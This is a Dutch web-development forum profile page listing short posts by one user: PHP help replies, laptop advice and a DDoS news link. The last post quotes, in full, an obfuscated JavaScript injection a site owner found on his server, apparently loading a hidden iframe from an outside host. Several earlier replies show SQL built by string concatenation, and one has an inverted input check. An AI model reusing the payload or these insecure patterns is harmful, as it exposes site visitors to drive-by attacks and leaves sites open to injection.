Posts by Luc

  • Grote klacht!

    Je topic zal inderdaad gesloten worden, maar dat ligt er vooral aan hoe je dit naar buiten brengt, en voor klachten over moderators moet je gewoon bij Willem zijn!

  • ddos legaal?


    http://tweakers.net/nieuws/827…staan-ddos-aanvallen.html

  • Stukjes link coderen

    [offtopic]@ lars,
    dat is dan wel heel nieuw voor mij dat jullie dit doen, toen ik nog in het team zat leek het daar anders niet op.
    [/offtopic]


    Je zou ook gewoon MD5/SHA1 kunnen gebruiken, want waarom zou je willen de-coderen?


    Als het in een database staat haal je het id gewoon ook als MD5 op


    PHP
    mysql_query("SELECT * FROM vragen WHERE MD5(id)='".MD5($id)."'");


    Volgens mij zou zoiets ook moeten kunnen.


    Met vriendelijke groet,


    Luc

  • Macbook/Windows

    [offtopic]Jongens ontopic, Scarface komt uit de tijd dat windows ME crashte, en dat er voor mac's nog geen virussen bestonden. Keep on dreaming!
    [/offtopic]


    Sven als ik jou was zou ik een laptop van tussen de 500 en 800 euro kopen. Deze voldoen vaak meer dan genoeg aan de eisen van school, en zo houdt je nog geld over voor over een paar jaar wanneer je laptop niet meer aan die eisen voldoet. Ze gaan namelijk niet langer mee hoor die van 1200 euro. Misschien wel als eisenlijst maar de levensduur van een laptop houdt vaak op na max 5 jaar.

  • Geld af en bij

    heel even simpel voorbeeld:


    PHP
    UPDATE cash=cash+".$bedrag." WHERE user='1';
UPDATE cash=cash-".$bedrag." WHERE user='2';

  • Undefined index pagina systeem

    $pageid = '0';
    $pageid = 0;


    dan is het een int. Maar als jij 0 ingeeft als id en die bestaat niet gaat het mis. Dus moet het ipv 0 1 zijn.


    Zelf beredeneren kan echt geen kwaad.

  • Undefined index pagina systeem

    PHP
    <?php
if (! isset($_GET['p']) || ctype_digit($_GET['p'])) {
    $pageid = '0';
} else {
$pageid = $_GET['p'];
}


    Deze zal geen errors geven, isset zorgt ervoor dat er wordt gecontroleerd of hij bestaat en ctype_digit kijkt of het alleen maar uit cijfers bestaat.

  • Trema in bericht kan niet

    Je moet om $id, $bericht slashes plaatsen


    dus bijv:


    mysql_real_escape_string($id)
    mysql_real_escape_string($bericht)


    Bij het oproepen gebruik je dan stripslashes() en htmlentities($bericht, ENT QUOTES);


    succes.

  • Javascript injecty?

    Beste leden van CP,


    Ik werd net gebeld door mijn baas dat een van de websites niet meer werkte, vervolgens log ik in op de server om te kijken en het eerste wat ik zie is deze code:


    PHP
    <script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="3.5$3.5$51.5$50$15$19$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$48$54.5$49$59.5$18.5$19.5$44.5$23$45.5$19.5$60.5$5.5$3.5$3.5$3.5$51.5$50$56$47.5$53.5$49.5$56$19$19.5$28.5$5.5$3.5$3.5$61.5$15$49.5$53$56.5$49.5$15$60.5$5.5$3.5$3.5$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$58.5$56$51.5$57$49.5$19$16$29$51.5$50$56$47.5$53.5$49.5$15$56.5$56$48.5$29.5$18.5$51$57$57$55$28$22.5$22.5$49$57.5$48$53$51.5$52.5$47.5$51.5$57$49.5$49$56.5$56$22$48.5$54.5$53.5$22.5$53.5$47.5$51.5$54$22$55$51$55$30.5$55$47.5$50.5$49.5$29.5$49.5$25.5$25$27$49$27.5$27.5$24$24.5$50$27$50$49.5$24$47.5$23$18.5$15$58.5$51.5$49$57$51$29.5$18.5$23.5$23$18.5$15$51$49.5$51.5$50.5$51$57$29.5$18.5$23.5$23$18.5$15$56.5$57$59.5$53$49.5$29.5$18.5$58$51.5$56.5$51.5$48$51.5$53$51.5$57$59.5$28$51$51.5$49$49$49.5$54$28.5$55$54.5$56.5$51.5$57$51.5$54.5$54$28$47.5$48$56.5$54.5$53$57.5$57$49.5$28.5$53$49.5$50$57$28$23$28.5$57$54.5$55$28$23$28.5$18.5$30$29$22.5$51.5$50$56$47.5$53.5$49.5$30$16$19.5$28.5$5.5$3.5$3.5$61.5$5.5$3.5$3.5$50$57.5$54$48.5$57$51.5$54.5$54$15$51.5$50$56$47.5$53.5$49.5$56$19$19.5$60.5$5.5$3.5$3.5$3.5$58$47.5$56$15$50$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$51.5$50$56$47.5$53.5$49.5$18.5$19.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$56.5$56$48.5$18.5$21$18.5$51$57$57$55$28$22.5$22.5$49$57.5$48$53$51.5$52.5$47.5$51.5$57$49.5$49$56.5$56$22$48.5$54.5$53.5$22.5$53.5$47.5$51.5$54$22$55$51$55$30.5$55$47.5$50.5$49.5$29.5$49.5$25.5$25$27$49$27.5$27.5$24$24.5$50$27$50$49.5$24$47.5$23$18.5$19.5$28.5$50$22$56.5$57$59.5$53$49.5$22$58$51.5$56.5$51.5$48$51.5$53$51.5$57$59.5$29.5$18.5$51$51.5$49$49$49.5$54$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$55$54.5$56.5$51.5$57$51.5$54.5$54$29.5$18.5$47.5$48$56.5$54.5$53$57.5$57$49.5$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$53$49.5$50$57$29.5$18.5$23$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$57$54.5$55$29.5$18.5$23$18.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$58.5$51.5$49$57$51$18.5$21$18.5$23.5$23$18.5$19.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$51$49.5$51.5$50.5$51$57$18.5$21$18.5$23.5$23$18.5$19.5$28.5$5.5$3.5$3.5$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$48$54.5$49$59.5$18.5$19.5$44.5$23$45.5$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$50$19.5$28.5$5.5$3.5$3.5$61.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-619!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}</script>


    Kan het zo zijn dat dit een injectie is geweest en zo ja hoe voorkom je het? Ik weet dat er sinds kort een CMS achter draait dat niet door mij is geïnstalleerd en geconfigureerd. Maar ben toch benieuwd waar dit zo ineens vandaan komt.


    Met vriendelijke groet,


    Luc